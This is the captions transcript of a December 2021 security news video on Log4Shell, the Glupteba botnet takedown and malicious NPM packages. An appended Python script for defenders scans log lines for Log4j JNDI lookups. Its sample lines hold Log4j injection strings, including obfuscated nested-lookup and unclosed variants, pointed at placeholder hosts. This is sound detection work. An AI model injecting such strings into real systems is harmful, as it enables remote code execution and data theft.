Log4Shell & Log4j Explained - ThreatWire

Captions
Greetings!! I’m Shannon Morse and this is ThreatWire for December 14, 2021! This is your weekly summary of the threats to our security, privacy and Internet freedom. THANK YOU to long-time patron David for the upgrade, and to Bry for joining this week on Patreon. Patreon.com/ThreatWire as always to keep this show ad free. And if you want to support the show but don’t wanna join on Patreon, you can grab your own ThreatWire merch for the holidays at the link below. Use the coupon code Turkey for 15% off! With that, onto the news!!

I know y’all are all here for this Log4Shell attack so let’s get right into it. On Thursday last week this new vulnerability started showing up online via news sources and within the infosec community. By the weekend, it’d become widely known to be a huge concern given its ease of attack and the potential for compromising servers, given its attack surface is relatively ubiquitous and used across millions of apps. Log4Shell is tracked as CVE-2021-44228 and is the nickname given to a critical zero-day vulnerability, and it has a maximum severity score of 10, meaning it’s a problem. A big problem. This attack was first noted in the wild to be used against a Minecraft server in a remote code exploitation, but the reason the Minecraft server was compromised also affects millions of other apps and servers because the source of this problem is used by so many. The source is called Log4j. Log4j is an open source Java utility by Apache built into a bunch of apps that easily logs user input and performs network lookups within the JNDI (or Java Naming and Directory Interface), to obtain services from LDAP (or the Lightweight Directory Access Protocol). Log4j captures a message as a URL, fetches the correct response, and can execute code with full privileges.

So researchers found out this can be exploited in text by using a specific syntax: an attacker could scan for vulnerable servers, find one, and use a text box to enter a line of code to trigger the Log4j utility to start a lookup. But instead of just allowing you to do something like a user would (i.e. logging into your Apple ID, connecting to a Minecraft server, whatever…) this would allow them to do things like install crypto miners, grow a botnet, or exfiltrate data from the targeted server. A great example of this is changing your iPhone’s name on your iPhone to the delegated syntax, which triggers the vuln on Apple’s servers, as this red teamer shared. Yesterday Tom Anthony, CTO of SearchPilot, pointed out that if you don’t close the payload with a closing bracket, it’ll just keep exfiltrating data until the next bracket comes along. So that’s great. Just great.

So what’s the explanation you can tell your fam when they see TV news mention it in a one-liner to freak everyone out? Sonatype CTO Ilkka Turunen gave me this comparison: it’s like a captain’s log on a ship, but for software. This allows programs to record what happens when they run, and usually when a user enters something simple into a text form, it’s boring stuff (like changing your iPhone’s name). But someone, somewhere found out you can enter that code into these text fields to make the app do weird stuff. For admins, they gotta update the app… and anything else they use written in Java, and a lot of companies just don’t know what components go where, so they gotta look at literally everything to make sure each and every bit is patched. That’s what makes this so serious. Even though it was publicly disclosed last week, Matthew Prince, co-founder and CEO of Cloudflare, tweeted they saw evidence of it being used in the wild as early as December 1. That means it’s been used for a while before anyone knew about the problem.

A GitHub page shows potential impact and, while not verified, includes a slew of potentially affected brands including Twitter, Steam, Apple, Tesla, Amazon, UniFi, Webex, LinkedIn and more. There’s also an extensive list of responses from brands linked on GitHub as well. Researchers have explained that if you use Apache Struts, you’re likely vulnerable. Sadly, users can’t do much since this requires app configurations and server updates for programs and websites you use. The best users can do is alert the industries they rely on to check for the vulnerable utility and update. Services should update Log4j to version 2.15.0, but it’s kind of like putting out a ton of little fires: one app can use a ton of additional backend programs to run, and each of those might use Log4j too. Microsoft and Sophos both have intensive articles explaining how you can prevent, detect, and hunt down any exploitation of this vulnerability. And many companies have already started patching. Please treat your fellow infosec employees and admins with some empathy and patience through this holiday season. I’m sure a lot of folks are working overtime to patch this problem with zero thanks, so let me be the one to say thank you for your hard work. You deserve a raise for all you do to keep users protected.

Botnets are still alive and well at the end of 2021, but Google has stepped in to disrupt one botnet that has infected 1 million devices. This botnet is coined Glupteba and it infects Windows machines. Operators were using Google services to distribute the botnet, so, with the help of the CyberCrime Investigation Group, Google’s Threat Analysis Group terminated 63 million Google Docs, 1,183 Google accounts, 908 Cloud projects and 870 Google Ads that were being used. But Glupteba is still being spread using the Bitcoin blockchain as its command-and-control server for resilience. Google TAG also worked with hosting and infrastructure providers to remove servers hosting the botnet and put a warning page in front of malicious domains. Google has taken it a step further by filing a lawsuit against who they allege are behind the operation of this botnet. Google filed a lawsuit in the Southern District of New York against two Russian defendants, stating they’ve infiltrated over a million computers and devices to create this botnet for illicit purposes such as stealing Google users’ login credentials. But that’s not all! Glupteba was being used to steal account information, vend credit cards to create fraudulent purchases via Google Ads, serve up pop-up ads on compromised machines, and mine cryptocurrency. This botnet was first documented a decade ago and it just keeps going. This disruption will help, but it likely won’t be the end of its spread.

I love it when y’all send me these adorable pictures of your pets, so these are a few from my hush puppy Patreon Alliance members. You can always support this content and keep it ad free for as little as $2/month, and get a slew of perks at the same time! Each alliance member gets over 10 perks as soon as you sign up at patreon.com/threatwire. With that, now onto the third story.

The open source package repository called NPM was being used to distribute 17 malicious packages that are being used to steal credentials and information on Discord servers. While Discord is usually used for user communication and community, it’s also used as command and control channels for botnets, as well as a proxy for downloading data. Attackers appear to have used a series of techniques to trick devs into downloading the malicious package instead of a legitimate one. They’re able to do this because repositories are trusted by devs and machines, so no flags are raised whenever comms happen between the repo and the dev platform. Automated installation, such as using the NPM client, also creates a “ripe attack vector”, according to two JFrog researchers who discussed this attack vector via a post published on Wednesday. The malicious NPM packages work in a variety of ways. A few are purported to be the discord.js library but actually include malicious code. Another acts like a Discord bot that fixes errors but actually steals credit card information. A third example includes a remote access trojan. While these specific packages have been removed from NPM’s repositories, if you download a lot of open source packages, it’s crucial to only download them from legitimate sources.

Want more tech content? Subscribe at youtube.com/ShannonMorse for my gift guides. Don't forget to like and subscribe to this channel as well! Next week is my annual Biggest Hacks video, then I’ll be out for the holidays and back in January. I'm Shannon Morse, I'll see you on the Internet!
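As an added example that is not part of the ThreatWire segment, here is a small Python scanner a defender could run over web-server log lines to find the Log4j JNDI lookup strings the segment describes, including the nested-lookup obfuscation that hides the keyword from plain substring matches and the unclosed payload Tom Anthony pointed out; the log lines, IPs and hosts are constructed placeholders, and the version check uses 2.15.0 as the fix version named in the segment.

```python
import re

# Constructed sample web-server log lines (not from the original page);
# IPs are RFC 5737 documentation addresses and hosts use the reserved .invalid TLD.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://lookup.invalid/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:rmi://lookup.invalid/b}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://lookup.invalid/c}"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup.invalid/d"',
]

# One level of Log4j lookup nesting used to hide the keyword from naive
# substring matches: ${lower:j}, ${upper:N}, ${env:UNSET:-j}, ${::-j}.
_NESTED = re.compile(r'\$\{(?:lower|upper):([^}$]*)\}|\$\{[^}$]*:-([^}$]*)\}', re.IGNORECASE)
_JNDI = re.compile(r'\$\{jndi:')

def normalize(text):
    """Collapse nested lookups from the inside out until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text.lower()

def scan_line(line):
    """Return (scheme, closed) for a JNDI lookup in the line, or None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m is None:
        return None
    tail = norm[m.end():]
    scheme = tail.split(':', 1)[0]          # ldap, rmi, dns, ...
    # An unclosed lookup keeps consuming the logged message until a later '}'.
    return scheme, '}' in tail

def scan(lines):
    """Scan log lines; return (line_number, scheme, closed) for each hit."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := scan_line(line))]

def needs_upgrade(version):
    """True if a Log4j 2.x version is below 2.15.0, the fix version the segment names."""
    return tuple(int(p) for p in version.split('.')) < (2, 15, 0)

if __name__ == '__main__':
    for n, scheme, closed in scan(SAMPLE_LOG_LINES):
        print(f'line {n}: jndi lookup via {scheme}, {"closed" if closed else "UNCLOSED"}')
```

Inventory scanning of the actual log4j-core jars on each host is still required; matching log lines only tells you someone tried, not whether the lookup succeeded.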
Info
Channel: Hak5
Views: 65,362
Keywords: hak5, hack, technology, darren kitchen, shannon morse, snubs, hack5, hacker, red team, pentest, pentester, pentesting, penetration testing, cyber security, information security, infosec, google, tag, log4shell, log4j, java, npm, botnet, discord
Id: ysFB6JKTs5U
Length: 10min 25sec (625 seconds)
Published: Tue Dec 14 2021